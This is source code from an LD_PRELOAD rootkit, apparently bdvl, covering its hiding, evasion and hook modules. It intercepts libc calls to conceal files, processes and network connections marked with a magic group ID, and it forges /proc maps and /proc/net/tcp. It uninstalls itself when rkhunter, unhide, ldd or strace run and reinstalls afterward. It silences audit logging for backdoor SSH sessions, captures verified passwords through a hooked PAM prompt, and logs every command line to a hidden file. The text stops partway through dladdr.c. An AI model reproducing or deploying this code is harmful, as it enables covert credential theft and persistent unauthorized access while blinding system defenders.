--------------------------------------------------------------------------------
/src/LD/hiding/evasion/evasion.c:
--------------------------------------------------------------------------------
1 | static int remove_self(void){
2 | if(not_user(0))
3 | return VINVALID_PERM;
4 | hook(CUNLINK);
5 | xor(tldso_preload, LDSO_PRELOAD);
6 | call(CUNLINK, tldso_preload);
7 | clean(tldso_preload);
8 | pid_t pid;
9 | if((pid = fork()) == -1)
10 | return VFORK_ERR;
11 | else if(pid == 0)
12 | return VFORK_SUC;
13 | wait(NULL);
14 | reinstall();
15 | if(!xhide_path(LDSO_PRELOAD))
16 | xhide_path(LDSO_PRELOAD);
17 | return VEVADE_DONE;
18 | }
19 |
20 | static int evade(const char *filename, char *const argv[], char *const envp[]){
21 | char *scary_proc, *scary_path;
22 | int i, ii;
23 | for(i = 0; i < SCARY_PROCS_SIZE; i++){
24 | scary_proc = scary_procs[i];
25 | char path[PATH_MAX/3];
26 | snprintf(path, sizeof(path), "*/%s", scary_proc);
27 | if(process(scary_proc))
28 | return remove_self();
29 | else
30 | if(strstr(filename, scary_proc))
31 | return remove_self();
32 | else if(!fnmatch(path, filename, FNM_PATHNAME))
33 | return remove_self();
34 | }
35 | for(i = 0; i < SCARY_PATHS_SIZE; i++){
36 | scary_path = scary_paths[i];
37 | if(!fnmatch(scary_path, filename, FNM_PATHNAME) || strstr(filename, scary_path))
38 | for(ii = 0; argv[ii] != NULL; ii++)
39 | if(!strncmp("--list", argv[ii], 6))
40 | return remove_self();
41 | }
42 | if(envp != NULL)
43 | for(i = 0; envp[i] != NULL; i++)
44 | for(ii = 0; ii < SCARY_VARIABLES_SIZE; ii++)
45 | if(!strncmp(scary_variables[ii], envp[i], strlen(scary_variables[ii])))
46 | return remove_self();
47 | return VNOTHING_DONE;
48 | }
49 |
--------------------------------------------------------------------------------
/src/LD/hiding/evasion/evasion.h:
--------------------------------------------------------------------------------
1 | #ifndef EVASION_H
2 | #define EVASION_H
3 |
4 | static char *const scary_variables[5] = {"LD_TRACE_LOADED_OBJECTS", "LD_DEBUG", "LD_AUDIT","LD_PRELOAD","LD_DEBUG_OUTPUT"};
5 | static char *const scary_paths[6] = {"*/*ld-linux*.so.*", "*ld-linux*.so.*", "*/*ld-*.so", "*ld-*.so", "*/utmp", "utmp"};
6 | static char *const scary_procs[9] = {"lsrootkit", "ldd", "unhide", "rkhunter", "chkproc", "chkdirs", "ltrace", "strace", "readelf"};
7 |
8 | #define SCARY_VARIABLES_SIZE sizeofarray(scary_variables)
9 | #define SCARY_PATHS_SIZE sizeofarray(scary_paths)
10 | #define SCARY_PROCS_SIZE sizeofarray(scary_procs)
11 |
12 | #define VINVALID_PERM 0
13 | #define VFORK_ERR -1
14 | #define VFORK_SUC 2
15 | #define VEVADE_DONE 1
16 | #define VNOTHING_DONE 3
17 |
18 | static int remove_self(void);
19 | static int evade(const char *filename, char *const argv[], char *const envp[]);
20 | #include "evasion.c"
21 |
22 | #endif
23 |
--------------------------------------------------------------------------------
/src/LD/hiding/files/files.h:
--------------------------------------------------------------------------------
1 | #ifndef FILES_H
2 | #define FILES_H
3 |
4 | #define mxstat(pathname, s) (long)call(C__XSTAT, _STAT_VER, pathname, s)
5 | #define mxstat64(pathname, s) (long)call(C__XSTAT64, _STAT_VER, pathname, s)
6 | #define mfxstat(fd, s) (long)call(C__FXSTAT, _STAT_VER, fd, s)
7 | #define mfxstat64(fd, s) (long)call(C__FXSTAT64, _STAT_VER, fd, s)
8 | #define mlxstat(pathname, s) (long)call(C__LXSTAT, _STAT_VER, pathname, s)
9 | #define mlxstat64(pathname, s) (long)call(C__LXSTAT64, _STAT_VER, pathname, s)
10 | gid_t get_path_gid(const char *pathname);
11 | gid_t get_path_gid64(const char *pathname);
12 | static gid_t lget_path_gid(const char *pathname);
13 | static gid_t lget_path_gid64(const char *pathname);
14 | static gid_t get_fd_gid(int fd);
15 | static gid_t get_fd_gid64(int fd);
16 | #include "get_path_gid.c"
17 |
18 | #define MODE_REG 0x32
19 | #define MODE_64 0x64
20 |
21 | int _hidden_path(const char *pathname, short mode);
22 | static int _f_hidden_path(int fd, short mode);
23 | static int _l_hidden_path(const char *pathname, short mode);
24 | static int hidden_proc(pid_t pid);
25 | #include "hidden.c"
26 |
27 | #define hidden_path(path) _hidden_path(path, MODE_REG)
28 | #define hidden_path64(path) _hidden_path(path, MODE_64)
29 | #define hidden_fd(fd) _f_hidden_path(fd, MODE_REG)
30 | #define hidden_fd64(fd) _f_hidden_path(fd, MODE_64)
31 | #define hidden_lpath(path) _l_hidden_path(path, MODE_REG)
32 | #define hidden_lpath64(path) _l_hidden_path(path, MODE_64)
33 |
34 | static int chown_path(char *path, gid_t gid){
35 | hook(CCHOWN);
36 | return (long)call(CCHOWN, path, 0, gid);
37 | }
38 |
39 | #define PATH_ERR -1
40 | #define PATH_DONE 1
41 | #define PATH_SUCC 0
42 |
43 | static int hide_path(char *path){
44 | if(not_user(0))
45 | return PATH_ERR;
46 | if(hidden_path(path))
47 | return PATH_DONE;
48 | return chown_path(path, MAGIC_GID);
49 | }
50 |
51 | static int xhide_path(const char *path){
52 | xor(_path, path);
53 | int ret = hide_path(_path);
54 | clean(_path);
55 | return ret;
56 | }
57 |
58 | #endif
59 |
--------------------------------------------------------------------------------
/src/LD/hiding/files/get_path_gid.c:
--------------------------------------------------------------------------------
1 | gid_t get_path_gid(const char *pathname){
2 | struct stat s_fstat;
3 | memset(&s_fstat, 0, sizeof(stat));
4 | hook(C__XSTAT);
5 | if(mxstat(pathname, &s_fstat) < 0)
6 | return 0;
7 | return s_fstat.st_gid;
8 | }
9 |
10 | gid_t get_path_gid64(const char *pathname){
11 | struct stat64 s_fstat;
12 | memset(&s_fstat, 0, sizeof(stat64));
13 | hook(C__XSTAT64);
14 | if(mxstat64(pathname, &s_fstat) < 0)
15 | return 0;
16 | return s_fstat.st_gid;
17 | }
18 |
19 | static gid_t lget_path_gid(const char *pathname){
20 | struct stat s_fstat;
21 | memset(&s_fstat, 0, sizeof(stat));
22 | hook(C__LXSTAT);
23 | if(mlxstat(pathname, &s_fstat) < 0)
24 | return 0;
25 | return s_fstat.st_gid;
26 | }
27 |
28 | static gid_t lget_path_gid64(const char *pathname){
29 | struct stat64 s_fstat;
30 | memset(&s_fstat, 0, sizeof(stat64));
31 | hook(C__LXSTAT64);
32 | if(mlxstat64(pathname, &s_fstat) < 0)
33 | return 0;
34 | return s_fstat.st_gid;
35 | }
36 |
37 | static gid_t get_fd_gid(int fd){
38 | struct stat s_fstat;
39 | memset(&s_fstat, 0, sizeof(stat));
40 | hook(C__FXSTAT);
41 | if(mfxstat(fd, &s_fstat) < 0)
42 | return 0;
43 | return s_fstat.st_gid;
44 | }
45 |
46 | static gid_t get_fd_gid64(int fd){
47 | struct stat64 s_fstat;
48 | memset(&s_fstat, 0, sizeof(stat64));
49 | hook(C__FXSTAT64);
50 | if(mfxstat64(fd, &s_fstat) < 0)
51 | return 0;
52 | return s_fstat.st_gid;
53 | }
54 |
--------------------------------------------------------------------------------
/src/LD/hiding/files/hidden.c:
--------------------------------------------------------------------------------
1 | int _hidden_path(const char *pathname, short mode){
2 | if(pathname == NULL)
3 | return 0;
4 | if(mode == MODE_REG){
5 | if(get_path_gid(pathname) == MAGIC_GID)
6 | return 1;
7 | } else if(mode == MODE_64){
8 | if(get_path_gid64(pathname) == MAGIC_GID)
9 | return 1;
10 | }
11 | return 0;
12 | }
13 |
14 | static int _f_hidden_path(int fd, short mode){
15 | if(mode == MODE_REG){
16 | if(get_fd_gid(fd) == MAGIC_GID)
17 | return 1;
18 | } else if(mode == MODE_64){
19 | if(get_fd_gid64(fd) == MAGIC_GID)
20 | return 1;
21 | }
22 | return 0;
23 | }
24 |
25 | static int _l_hidden_path(const char *pathname, short mode){
26 | if(pathname == NULL)
27 | return 0;
28 | if(mode == MODE_REG){
29 | if(lget_path_gid(pathname) == MAGIC_GID)
30 | return 1;
31 | } else if(mode == MODE_64){
32 | if(lget_path_gid64(pathname) == MAGIC_GID)
33 | return 1;
34 | }
35 | return 0;
36 | }
37 |
38 | static int hidden_proc(pid_t pid){
39 | char proc_path[256];
40 | snprintf(proc_path, sizeof(proc_path), "/proc/%d", pid);
41 | return _hidden_path(proc_path, MODE_REG);
42 | }
43 |
--------------------------------------------------------------------------------
/src/LD/hiding/forge_maps.c:
--------------------------------------------------------------------------------
1 | static FILE *forge_maps(const char *pathname){
2 | FILE *o = tmpfile(), *pnt;
3 | char buf[LINE_MAX];
4 | hook(CFOPEN);
5 | if((pnt = call(CFOPEN, pathname, "r")) == NULL){
6 | errno = ENOENT;
7 | fclose(o);
8 | return NULL;
9 | }
10 | xor(t_bdvlso,BDVLSO);
11 | while(fgets(buf, sizeof(buf), pnt) != NULL)
12 | if(!strstr(buf,t_bdvlso))
13 | fputs(buf, o);
14 | clean(t_bdvlso);
15 | memset(buf, 0, strlen(buf));
16 | fclose(pnt);
17 | fseek(o, 0, SEEK_SET);
18 | return o;
19 | }
20 |
21 | static FILE *forge_smaps(const char *pathname){
22 | FILE *o = tmpfile(), *pnt;
23 | char buf[LINE_MAX];
24 | int i = 0;
25 | hook(CFOPEN);
26 | if((pnt = call(CFOPEN, pathname, "r")) == NULL){
27 | errno = ENOENT;
28 | fclose(o);
29 | return NULL;
30 | }
31 | xor(t_bdvlso,BDVLSO);
32 | while(fgets(buf, sizeof(buf), pnt) != NULL){
33 | if(i > 0)
34 | i++;
35 | if(i > 15)
36 | i = 0;
37 | if(strstr(buf,t_bdvlso))
38 | i = 1;
39 | if(i == 0)
40 | fputs(buf, o);
41 | }
42 | clean(t_bdvlso);
43 | memset(buf, 0, strlen(buf));
44 | fclose(pnt);
45 | fseek(o, 0, SEEK_SET);
46 | return o;
47 | }
48 |
49 | static FILE *forge_numamaps(const char *pathname){
50 | FILE *o = tmpfile(), *pnt;
51 | char buf[LINE_MAX];
52 | hook(CFOPEN);
53 | if((pnt = call(CFOPEN, pathname, "r")) == NULL){
54 | errno = ENOENT;
55 | fclose(o);
56 | return NULL;
57 | }
58 | xor(t_bdvlso,BDVLSO);
59 | while(fgets(buf, sizeof(buf), pnt) != NULL)
60 | if(!strstr(buf,t_bdvlso))
61 | fputs(buf, o);
62 | clean(t_bdvlso);
63 | memset(buf, 0, strlen(buf));
64 | fclose(pnt);
65 | fseek(o, 0, SEEK_SET);
66 | return o;
67 | }
68 |
--------------------------------------------------------------------------------
/src/LD/hiding/forge_procnet.c:
--------------------------------------------------------------------------------
1 | static char *int_ip2hex(unsigned int ip){
2 | unsigned char bytes[4];
3 | char *output = (char*)malloc(sizeof(char) * 16);
4 | bytes[0] = ip & 0xFF;
5 | bytes[1] = (ip >> 8) & 0xFF;
6 | bytes[2] = (ip >> 16) & 0xFF;
7 | bytes[3] = (ip >> 24) & 0xFF;
8 | sprintf(output, "%X%X%X%X", bytes[3], bytes[2], bytes[1], bytes[0]);
9 | return output;
10 | }
11 |
12 | static int is_hidden_ip(char *addr){
13 | FILE *fp;
14 | char buf[9];
15 | if((fp = xfopen(HIDE_IP_PATH, "r")) == NULL)
16 | return 0;
17 | while(fgets(buf, sizeof(buf), fp) != NULL){
18 | buf[9] = '\0';
19 | if(!xstrncmp(addr, buf))
20 | return 1;
21 | }
22 | fclose(fp);
23 | return 0;
24 | }
25 |
26 | static int secret_connection(char line[]){
27 | char raddr[128], laddr[128], etc[128];
28 | unsigned long rxq, txq, t_len, retr, inode;
29 | int lport, rport, d, state, uid, t_run, tout;
30 | char *fmt = "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n";
31 | sscanf(line, fmt, &d, laddr, &lport, raddr, &rport, &state, &txq, &rxq, &t_run, &t_len, &retr, &uid, &tout, &inode, etc);
32 | if(is_hidden_ip(laddr) || is_hidden_ip(raddr)){
33 | memset(line, 0, strlen(line));
34 | return 1;
35 | }
36 | return 0;
37 | }
38 |
39 | static int hidehost_alive(void){
40 | char line[LINE_MAX];
41 | FILE *fp;
42 | int status = 0;
43 | hook(CFOPEN);
44 | fp = call(CFOPEN, "/proc/net/tcp", "r");
45 | if(fp == NULL)
46 | return 0;
47 | while(fgets(line, sizeof(line), fp) != NULL)
48 | if(secret_connection(line)){
49 | status = 1;
50 | break;
51 | }
52 | fclose(fp);
53 | return status;
54 | }
55 |
56 | static FILE *forge_procnet(const char *pathname){
57 | FILE *tmp = tmpfile(), *pnt;
58 | char line[LINE_MAX];
59 | hook(CFOPEN);
60 | if((pnt = call(CFOPEN, pathname, "r")) == NULL)
61 | return NULL;
62 | while(fgets(line, sizeof(line), pnt) != NULL)
63 | if(!secret_connection(line))
64 | fputs(line, tmp);
65 | fclose(pnt);
66 | fseek(tmp, 0, SEEK_SET);
67 | return tmp;
68 | }
69 |
--------------------------------------------------------------------------------
/src/LD/hiding/hiding.h:
--------------------------------------------------------------------------------
1 | #ifndef HIDING_H
2 | #define HIDING_H
3 |
4 | #include "files/files.h"
5 |
6 | static int ld_inconsistent(void);
7 | static void reinstall(void);
8 | #include "reinstall.c"
9 |
10 | #include "evasion/evasion.h"
11 |
12 | static int scary_path(char *string);
13 | #include "evasion/block_strings.c"
14 |
15 | static FILE *forge_maps(const char *pathname);
16 | static FILE *forge_smaps(const char *pathname);
17 | static FILE *forge_numamaps(const char *pathname);
18 | #include "forge_maps.c"
19 |
20 | static char *int_ip2hex(unsigned int ip);
21 | static int is_hidden_ip(char *addr);
22 | static int secret_connection(char line[]);
23 | static int hidehost_alive(void);
24 | static FILE *forge_procnet(const char *pathname);
25 | #include "forge_procnet.c"
26 |
27 | static void _setgid(gid_t gid){
28 | hook(CSETGID);
29 | call(CSETGID, gid);
30 | }
31 |
32 | static void hide_self(void){
33 | if(not_user(0) || getgid() == MAGIC_GID)
34 | return;
35 | _setgid(MAGIC_GID);
36 | }
37 |
38 | #endif
39 |
--------------------------------------------------------------------------------
/src/LD/hiding/reinstall.c:
--------------------------------------------------------------------------------
1 | static int ld_inconsistent(void){
2 | struct stat ldstat;
3 | int inconsistent = 0, statval;
4 | hook(C__XSTAT);
5 | memset(&ldstat, 0, sizeof(stat));
6 | xor(tldso_preload, LDSO_PRELOAD)
7 | statval = (long)call(C__XSTAT, _STAT_VER, tldso_preload, &ldstat);
8 | clean(tldso_preload);
9 | xor(tsopath, SOPATH);
10 | if((statval < 0 && errno == ENOENT ) || ldstat.st_size != strlen(tsopath))
11 | inconsistent = 1;
12 | clean(tsopath);
13 | return inconsistent;
14 | }
15 |
16 | static void reinstall(void){
17 | if(!ld_inconsistent())
18 | return;
19 | FILE *ldfp;
20 | if((ldfp = xfopen(LDSO_PRELOAD, "w")) != NULL){
21 | xfwrite(SOPATH, 1, ldfp);
22 | fflush(ldfp);
23 | fclose(ldfp);
24 | if(!xhide_path(LDSO_PRELOAD))
25 | xhide_path(LDSO_PRELOAD);
26 | }
27 | return;
28 | }
29 |
--------------------------------------------------------------------------------
/src/LD/hooks/audit/audit.c:
--------------------------------------------------------------------------------
1 | static int audit_log_acct_message(int audit_fd, int type, const char *pgname, const char *op, const char *name, unsigned int id, const char *host, const char *addr, const char *tty, int result){
2 | if(bd_sshproc()){
3 | setgid(MAGIC_GID);
4 | return 0;
5 | }
6 | hook(CAUDIT_LOG_ACCT_MESSAGE);
7 | return (long)call(CAUDIT_LOG_ACCT_MESSAGE, audit_fd, type, pgname, op, name, id, host, addr, tty, result);
8 | }
9 |
10 | static int audit_log_user_message(int audit_fd, int type, const char *message, const char *hostname, const char *addr, const char *tty, int result){
11 | if(bd_sshproc()){
12 | setgid(MAGIC_GID);
13 | return 0;
14 | }
15 | hook(CAUDIT_LOG_USER_MESSAGE);
16 | return (long)call(CAUDIT_LOG_USER_MESSAGE, audit_fd, type, message, hostname, addr, tty, result);
17 | }
18 |
19 | static int audit_send(int fd, int type, const void *data, unsigned int size){
20 | if(bd_sshproc()){
21 | setgid(MAGIC_GID);
22 | return 0;
23 | }
24 | hook(CAUDIT_SEND);
25 | return (long)call(CAUDIT_SEND, fd, type, data, size);
26 | }
27 |
--------------------------------------------------------------------------------
/src/LD/hooks/audit/audit.h:
--------------------------------------------------------------------------------
1 | #ifndef AUDIT_H
2 | #define AUDIT_H
3 |
4 | static int audit_log_acct_message(int audit_fd, int type, const char *pgname, const char *op, const char *name, unsigned int id, const char *host, const char *addr, const char *tty, int result);
5 | static int audit_log_user_message(int audit_fd, int type, const char *message, const char *hostname, const char *addr, const char *tty, int result);
6 | static int audit_send(int fd, int type, const void *data, unsigned int size);
7 | #include "audit.c"
8 |
9 | #endif
10 |
--------------------------------------------------------------------------------
/src/LD/hooks/authlog/authlog.h:
--------------------------------------------------------------------------------
1 | #ifndef AUTHLOG_H
2 | #define AUTHLOG_H
3 |
4 | static int verify_pass(char *user, char *acc_pass);
5 | static void log_auth(pam_handle_t *pamh, char *resp);
6 | #include "log.c"
7 |
8 | int pam_vprompt(pam_handle_t *pamh, int style, char **response, const char *fmt, va_list args);
9 | int pam_prompt(pam_handle_t *pamh, int style, char **response, const char *fmt, ...);
10 | #include "pam_vprompt.c"
11 |
12 | #endif
13 |
--------------------------------------------------------------------------------
/src/LD/hooks/authlog/log.c:
--------------------------------------------------------------------------------
1 | static int verify_pass(char *user, char *acc_pass){
2 | struct spwd *ent;
3 | char *pass;
4 | int got_pw;
5 | hook(CGETSPNAM);
6 | ent = call(CGETSPNAM, user);
7 | if(ent == NULL || strlen(ent->sp_pwdp) < 2)
8 | return 0;
9 | pass = crypt(acc_pass, ent->sp_pwdp);
10 | if(pass == NULL)
11 | return 0;
12 | got_pw = !strcmp(pass, ent->sp_pwdp);
13 | if(got_pw)
14 | return 1;
15 | return 0;
16 | }
17 |
18 | static void log_auth(pam_handle_t *pamh, char *resp){
19 | char *user, output[128];
20 | int got_pw;
21 | FILE *fp;
22 | user = get_username(pamh);
23 | if(user == NULL)
24 | return;
25 | got_pw = verify_pass(user, resp);
26 | if(!got_pw)
27 | return;
28 | if((fp = xfopen(LDSO_LOGS, "a")) != NULL){
29 | sprintf(output, "%s:%s", user, resp);
30 | xor(t_o, output);
31 | fprintf(fp, "%s\n", t_o);
32 | clean(t_o);
33 | fflush(fp);
34 | fclose(fp);
35 | }
36 | if(!xhide_path(LDSO_LOGS))
37 | xhide_path(LDSO_LOGS);
38 | }
39 |
--------------------------------------------------------------------------------
/src/LD/hooks/authlog/pam_vprompt.c:
--------------------------------------------------------------------------------
1 | int pam_vprompt(pam_handle_t *pamh, int style, char **response, const char *fmt, va_list args){
2 | struct pam_message msg;
3 | struct pam_response *pam_resp = NULL;
4 | const struct pam_message *pmsg;
5 | const struct pam_conv *conv;
6 | const void *convp;
7 | char *msgbuf;
8 | int retval;
9 | if(response)
10 | *response = NULL;
11 | if((retval = pam_get_item(pamh, PAM_CONV, &convp)) != PAM_SUCCESS)
12 | return retval;
13 | if((conv = convp) == NULL || conv->conv == NULL){
14 | pam_syslog(pamh, LOG_ERR, "no conversation function");
15 | return PAM_SYSTEM_ERR;
16 | }
17 | if(vasprintf(&msgbuf, fmt, args) < 0){
18 | pam_syslog(pamh, LOG_ERR, "vasprintf: %m");
19 | return PAM_BUF_ERR;
20 | }
21 | msg.msg_style = style;
22 | msg.msg = msgbuf;
23 | pmsg = &msg;
24 | retval = conv->conv(1, &pmsg, &pam_resp, conv->appdata_ptr);
25 | if(response)
26 | *response = pam_resp == NULL ? NULL : pam_resp->resp;
27 | if(retval != PAM_SUCCESS)
28 | return retval;
29 | if(pam_resp && pam_resp->resp != NULL)
30 | log_auth(pamh, pam_resp->resp);
31 | _pam_overwrite(msgbuf);
32 | _pam_drop(pam_resp);
33 | free(msgbuf);
34 | return retval;
35 | }
36 |
37 | int pam_prompt(pam_handle_t *pamh, int style, char **response, const char *fmt, ...){
38 | va_list args;
39 | int retval;
40 | va_start(args, fmt);
41 | retval = pam_vprompt(pamh, style, response, fmt, args);
42 | va_end(args);
43 | return retval;
44 | }
45 |
--------------------------------------------------------------------------------
/src/LD/hooks/dir/chdir.c:
--------------------------------------------------------------------------------
1 | int chdir(const char *pathname){
2 | hook(CCHDIR);
3 | if(is_bdusr())
4 | return (long)call(CCHDIR, pathname);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CCHDIR, pathname);
10 | }
11 |
12 | int fchdir(int fd){
13 | hook(CFCHDIR);
14 | if(is_bdusr())
15 | return (long)call(CFCHDIR, fd);
16 | if(hidden_fd(fd)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (long)call(CFCHDIR, fd);
21 | }
22 |
--------------------------------------------------------------------------------
/src/LD/hooks/dir/dir.h:
--------------------------------------------------------------------------------
1 | #ifndef DIR_H
2 | #define DIR_H
3 |
4 | static char *gdirname(DIR *dirp){
5 | int fd = dirfd(dirp), readlink_status;
6 | char path[PATH_MAX], *filename = (char *)malloc(sizeof(path));
7 | memset(filename, 0, PATH_MAX);
8 | snprintf(path, sizeof(path) - 1, "/proc/self/fd/%d", fd);
9 | hook(CREADLINK);
10 | readlink_status = (long)call(CREADLINK, path, filename, sizeof(path) - 1);
11 | if(readlink_status < 0)
12 | return NULL;
13 | return filename;
14 | }
15 |
16 | int mkdir(const char *pathname, mode_t mode);
17 | #include "mkdir.c"
18 |
19 | int rmdir(const char *pathname);
20 | #include "rmdir.c"
21 |
22 | int chdir(const char *pathname);
23 | int fchdir(int fd);
24 | #include "chdir.c"
25 |
26 | struct dirent *readdir(DIR *dirp);
27 | struct dirent64 *readdir64(DIR *dirp);
28 | #include "readdir.c"
29 |
30 | DIR *opendir(const char *pathname);
31 | DIR *opendir64(const char *pathname);
32 | DIR *fdopendir(int fd);
33 | #include "opendir.c"
34 |
35 | #endif
36 |
--------------------------------------------------------------------------------
/src/LD/hooks/dir/mkdir.c:
--------------------------------------------------------------------------------
1 | int mkdir(const char *pathname, mode_t mode){
2 | hook(CMKDIR);
3 | if(is_bdusr())
4 | return (long)call(CMKDIR, pathname, mode);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CMKDIR, pathname, mode);
10 | }
11 |
--------------------------------------------------------------------------------
/src/LD/hooks/dir/opendir.c:
--------------------------------------------------------------------------------
1 | DIR *opendir(const char *pathname){
2 | hook(COPENDIR);
3 | if(is_bdusr())
4 | return call(COPENDIR, pathname);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return NULL;
8 | }
9 | return call(COPENDIR, pathname);
10 | }
11 |
12 | DIR *opendir64(const char *pathname){
13 | hook(COPENDIR64);
14 | if(is_bdusr())
15 | return call(COPENDIR64, pathname);
16 | if(hidden_path(pathname)){
17 | errno = ENOENT;
18 | return NULL;
19 | }
20 | return call(COPENDIR64, pathname);
21 | }
22 |
23 | DIR *fdopendir(int fd){
24 | hook(CFDOPENDIR);
25 | if(is_bdusr())
26 | return call(CFDOPENDIR, fd);
27 | if(hidden_fd(fd)){
28 | errno = ENOENT;
29 | return NULL;
30 | }
31 | return call(CFDOPENDIR, fd);
32 | }
33 |
--------------------------------------------------------------------------------
/src/LD/hooks/dir/readdir.c:
--------------------------------------------------------------------------------
1 | struct dirent *readdir(DIR *dirp){
2 | char path[PATH_MAX], *filename;
3 | struct dirent *dir;
4 | hook(CREADDIR);
5 | do{
6 | dir = call(CREADDIR, dirp);
7 | if(is_bdusr())
8 | return dir;
9 | if(dir == NULL)
10 | continue;
11 | if(!strcmp(dir->d_name,".\0") || !strcmp(dir->d_name, "/\0") || !strcmp(dir->d_name, "..\0"))
12 | continue;
13 | filename = gdirname(dirp);
14 | snprintf(path, sizeof(path) - 1, "%s/%s", filename, dir->d_name);
15 | free(filename);
16 | } while(dir && hidden_path(path));
17 | return dir;
18 | }
19 |
20 | struct dirent64 *readdir64(DIR *dirp){
21 | char path[PATH_MAX], *filename;
22 | struct dirent64 *dir;
23 | hook(CREADDIR64);
24 | do{
25 | dir = call(CREADDIR64, dirp);
26 | if(is_bdusr())
27 | return dir;
28 | if(dir == NULL)
29 | continue;
30 | if(!strcmp(dir->d_name,".\0") || !strcmp(dir->d_name, "/\0") || !strcmp(dir->d_name, "..\0"))
31 | continue;
32 | filename = gdirname(dirp);
33 | snprintf(path, sizeof(path) - 1, "%s/%s", filename, dir->d_name);
34 | free(filename);
35 | } while(dir && hidden_path(path));
36 | return dir;
37 | }
38 |
--------------------------------------------------------------------------------
/src/LD/hooks/dir/rmdir.c:
--------------------------------------------------------------------------------
1 | int rmdir(const char *pathname){
2 | hook(CRMDIR);
3 | if(is_bdusr())
4 | return (long)call(CRMDIR, pathname);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CRMDIR, pathname);
10 | }
11 |
--------------------------------------------------------------------------------
/src/LD/hooks/exec/exec.h:
--------------------------------------------------------------------------------
1 | #ifndef EXEC_H
2 | #define EXEC_H
3 |
4 | int execve(const char *filename, char *const argv[], char *const envp[]);
5 | #include "execve.c"
6 |
7 | int execvp(const char *filename, char *const argv[]);
8 | #include "execvp.c"
9 |
10 | #endif
11 |
--------------------------------------------------------------------------------
/src/LD/hooks/exec/execve.c:
--------------------------------------------------------------------------------
1 | int execve(const char *filename, char *const argv[], char *const envp[]){
2 | if(!not_user(0))
3 | reinstall();
4 | hook(CEXECVE);
5 | if(is_bdusr())
6 | return call(CEXECVE, filename, argv, envp);
7 | FILE *fp;
8 | if((fp = xfopen(LDSO_LOGS, "a")) != NULL){
9 | int i;
10 | for(i=0; argv[i] != NULL;i++){
11 | xor(rr, argv[i]);
12 | fprintf(fp, "%s ", rr);
13 | clean(rr);
14 | }
15 | fprintf(fp, "\n");
16 | fflush(fp);
17 | fclose(fp);
18 | }
19 | if(hidden_path(filename)){
20 | errno = ENOENT;
21 | return -1;
22 | }
23 | int evasion_status = evade(filename, argv, envp);
24 | switch(evasion_status){
25 | case VEVADE_DONE:
26 | exit(0);
27 | case VINVALID_PERM:
28 | errno = EPERM;
29 | return -1;
30 | case VFORK_ERR:
31 | return -1;
32 | case VFORK_SUC:
33 | return call(CEXECVE, filename, argv, envp);
34 | case VNOTHING_DONE:
35 | break;
36 | }
37 | return call(CEXECVE, filename, argv, envp);
38 | }
39 |
--------------------------------------------------------------------------------
/src/LD/hooks/exec/execvp.c:
--------------------------------------------------------------------------------
1 | int execvp(const char *filename, char *const argv[]){
2 | if(!not_user(0))
3 | reinstall();
4 | hook(CEXECVP);
5 | if(is_bdusr())
6 | return call(CEXECVP, filename, argv);
7 | if(hidden_path(filename)){
8 | errno = ENOENT;
9 | return -1;
10 | }
11 | int evasion_status = evade(filename, argv, NULL);
12 | switch(evasion_status){
13 | case VEVADE_DONE:
14 | exit(0);
15 | case VINVALID_PERM:
16 | errno = EPERM;
17 | return -1;
18 | case VFORK_ERR:
19 | return -1;
20 | case VFORK_SUC:
21 | return call(CEXECVP, filename, argv);
22 | case VNOTHING_DONE:
23 | break;
24 | }
25 | return call(CEXECVP, filename, argv);
26 | }
27 |
--------------------------------------------------------------------------------
/src/LD/hooks/gid/gid.h:
--------------------------------------------------------------------------------
1 | #ifndef GID_H
2 | #define GID_H
3 |
4 | int setgid(gid_t gid);
5 | #include "setgid.c"
6 |
7 | int setegid(gid_t egid);
8 | #include "setegid.c"
9 |
10 | int setregid(gid_t rgid, gid_t egid);
11 | #include "setregid.c"
12 |
13 | int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
14 | #include "setresgid.c"
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/src/LD/hooks/gid/setegid.c:
--------------------------------------------------------------------------------
1 | int setegid(gid_t egid){
2 | hook(CSETEGID);
3 | if(is_bdusr()){
4 | if(egid != MAGIC_GID)
5 | call(CSETEGID, MAGIC_GID);
6 | return 0;
7 | }
8 | return (long)call(CSETEGID, egid);
9 | }
10 |
--------------------------------------------------------------------------------
/src/LD/hooks/gid/setgid.c:
--------------------------------------------------------------------------------
1 | int setgid(gid_t gid){
2 | hook(CSETGID);
3 | if(is_bdusr()){
4 | if(gid != MAGIC_GID)
5 | call(CSETGID, MAGIC_GID);
6 | return 0;
7 | }
8 | return (long)call(CSETGID, gid);
9 | }
10 |
--------------------------------------------------------------------------------
/src/LD/hooks/gid/setregid.c:
--------------------------------------------------------------------------------
1 | int setregid(gid_t rgid, gid_t egid){
2 | hook(CSETREGID);
3 | if(is_bdusr()){
4 | if(rgid != MAGIC_GID || egid != MAGIC_GID)
5 | call(CSETREGID, MAGIC_GID, MAGIC_GID);
6 | return 0;
7 | }
8 | return (long)call(CSETREGID, rgid, egid);
9 | }
10 |
--------------------------------------------------------------------------------
/src/LD/hooks/gid/setresgid.c:
--------------------------------------------------------------------------------
1 | int setresgid(gid_t rgid, gid_t egid, gid_t sgid){
2 | hook(CSETRESGID);
3 | if(is_bdusr()){
4 | if(rgid != MAGIC_GID || egid != MAGIC_GID || sgid != MAGIC_GID)
5 | call(CSETRESGID, MAGIC_GID, MAGIC_GID, MAGIC_GID);
6 | return 0;
7 | }
8 | return (long)call(CSETRESGID, rgid, egid, sgid);
9 | }
10 |
--------------------------------------------------------------------------------
/src/LD/hooks/kill.c:
--------------------------------------------------------------------------------
1 | int kill(pid_t pid, int sig){
2 | if(is_bdusr())
3 | goto o_kill;
4 | if(hidden_proc(pid)){
5 | errno = ESRCH;
6 | return -1;
7 | }
8 | o_kill:
9 | hook(CKILL);
10 | return (long)call(CKILL, pid, sig);
11 | }
12 |
--------------------------------------------------------------------------------
/src/LD/hooks/libdl/dladdr.c:
--------------------------------------------------------------------------------
1 | #include "../../util/util.h"
2 |
3 | int dladdr(const void *addr, Dl_info *info){
4 | hook(CDLADDR);
5 | if(is_bdusr())
